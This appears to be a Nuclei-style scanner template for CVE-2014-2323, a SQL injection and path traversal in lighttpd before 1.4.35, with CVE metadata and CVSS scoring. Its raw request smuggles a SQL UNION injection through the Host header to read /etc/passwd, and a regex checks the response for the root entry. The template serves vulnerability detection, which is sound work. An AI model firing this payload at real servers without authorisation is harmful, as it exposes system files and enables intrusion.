27 lines
796 B
YAML
27 lines
796 B
YAML
id: CVE-2014-2323
|
|
|
|
info:
|
|
name: Lighttpd 1.4.34 SQL injection and path traversal
|
|
description: SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname.
|
|
reference: https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt
|
|
author: geeknik
|
|
severity: critical
|
|
tags: cve,cve2014,sqli,lighttpd,injection
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.80
|
|
cve-id: CVE-2014-2323
|
|
cwe-id: CWE-89
|
|
|
|
requests:
|
|
- raw:
|
|
- |+
|
|
GET /etc/passwd HTTP/1.1
|
|
Host: [::1]' UNION SELECT '/
|
|
|
|
unsafe: true
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0:"
|